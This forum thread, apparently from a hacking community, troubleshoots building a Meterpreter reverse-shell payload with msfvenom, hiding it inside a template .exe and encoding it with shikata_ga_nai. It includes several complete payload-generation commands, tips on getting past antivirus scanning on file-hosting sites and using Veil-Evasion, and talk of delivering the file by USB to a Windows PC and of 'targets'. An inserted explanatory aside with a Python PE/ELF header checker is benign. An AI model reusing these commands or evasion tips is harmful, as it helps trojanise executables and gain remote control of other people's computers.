Forum Thread: Metasploit Framework MsfVenom Payload

I want to create a payload into the template.exe file and encrypt it with x86/shikataganai but when I run it it gives me the Error:

Error: Couldn't find DOS e_magic
I tried to google it, but I, as a Noob, didn't really find anything.
Here's everything:

msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikataga_nai -f exe > template.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 100 iterations of x86/shikataganai
x86/shikataganai chosen with final size 3181
Payload size: 3181 bytes
Error: Couldn't find DOS e_magic

17 Responses

Try -o (Output Directory and filename) instead of > template.exe. That always gave me errors. Also as I remember the Meterpreter is reverse(underscore)tcp.

In your case it'll be,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikata_ga_nai -f exe -o template.exe

Tried it:

msfvenom -p windows/meterpreter/reversetcp LHOST=inte adress LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikatanai -i 30 -f exe -o template.exe

Error: undefined method `datastore' for nil:NilClass

Wait no, I wrote the encoder wrong.
Still the same Error:
Error: Couldn't find DOS e_magic

Have you tried without the encoding? If it works, check your encoding again. I'm not very familiar with encoding.

It works without -x. Does that help?

Nope, still won't work without encoding:
Error: Couldn't find DOS e_magic

Another problem is, always when I encode it and put it on a USB, I don't have access to it on the Windows PC.

Plus, when I upload it to MediaFire, it ALWAYS, oblivious to how many iterations there are, detects it as a virus.

Are you using MSF on Windows? Or on Linux inside a VM? If you are using it on Windows you will probably get tons of errors and crap. Extra plugins and support files may be required.

And yeah, many famous File hosting sites and clouds will detect them whatever you do. Try the free, no-registration sites.

Nope, I'm on Backbox, installed on an HDD.

Try these and tell me which steps passed and what failed. So we can isolate the problem.

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -f exe -o template.exe
  2. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -f exe -o template.exe
  3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -e x86/shikata_ga_nai -f exe -o template.exe

Don't copy and paste, you'll have to write.

Wait, no, the first and third worked, the second failed with the same ERROR.

All of it works, I already told you, the first code worked without the -x part.

Wait, no it was the cause of the C Program. I used a Teamspeak.exe and it worked ^^
Thank you!

Nope, still
Error: Couldn't find DOS e_magic
I write the templates in C and compile them with gcc:
gcc -std=c99 name.c -o name.exe
Is that the cause?
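
What the error message refers to, as an added example that is not part of the original thread: `e_magic` is the first field of the DOS header that every Windows PE file starts with (the bytes `MZ`), whereas a native gcc on Linux emits an ELF file whatever the output is named. The sketch below classifies a file by its header bytes rather than its extension, which is also how a responder confirms what a file named `.exe` really is; the function names and sample bytes are constructed for illustration.

```python
import struct

def classify_executable(data: bytes) -> str:
    """Describe what the leading header bytes say the file really is."""
    if data[:4] == b"\x7fELF":
        return "ELF (Linux/Unix binary, not a Windows PE)"
    # e_magic: first two bytes of the DOS header must be 'MZ'.
    if data[:2] != b"MZ":
        return "unknown: no DOS e_magic ('MZ') at offset 0"
    if len(data) < 0x40:
        return "truncated: DOS header shorter than 64 bytes"
    # e_lfanew (offset 0x3C) is the file offset of the PE signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MZ stub without a valid PE signature"
    # The COFF Machine field follows the 4-byte signature.
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    arch = {0x014C: "x86", 0x8664: "x64"}.get(machine, hex(machine))
    return f"PE ({arch})"

def classify_file(path: str) -> str:
    """Read only the first 4 KiB, enough for the DOS and COFF headers."""
    with open(path, "rb") as fh:
        return classify_executable(fh.read(4096))

def sample_pe(machine: int = 0x014C) -> bytes:
    """Constructed minimal header: DOS header, PE signature, COFF header."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # PE signature right after DOS header
    return bytes(dos) + b"PE\0\0" + struct.pack("<H", machine) + bytes(18)

# Constructed sample: the start of a 64-bit ELF header, as gcc on Linux writes.
SAMPLE_ELF = b"\x7fELF\x02\x01\x01" + bytes(57)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(f"{path}: {classify_file(path)}")
    print("sample PE :", classify_executable(sample_pe()))
    print("sample ELF:", classify_executable(SAMPLE_ELF))
```
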

You can use veil evasion or any other encoder and see.

I need an answer to my question, "if you make a payload for an Android phone, would you be on the same network connection with your target?" and the session died when it connects on the same network.
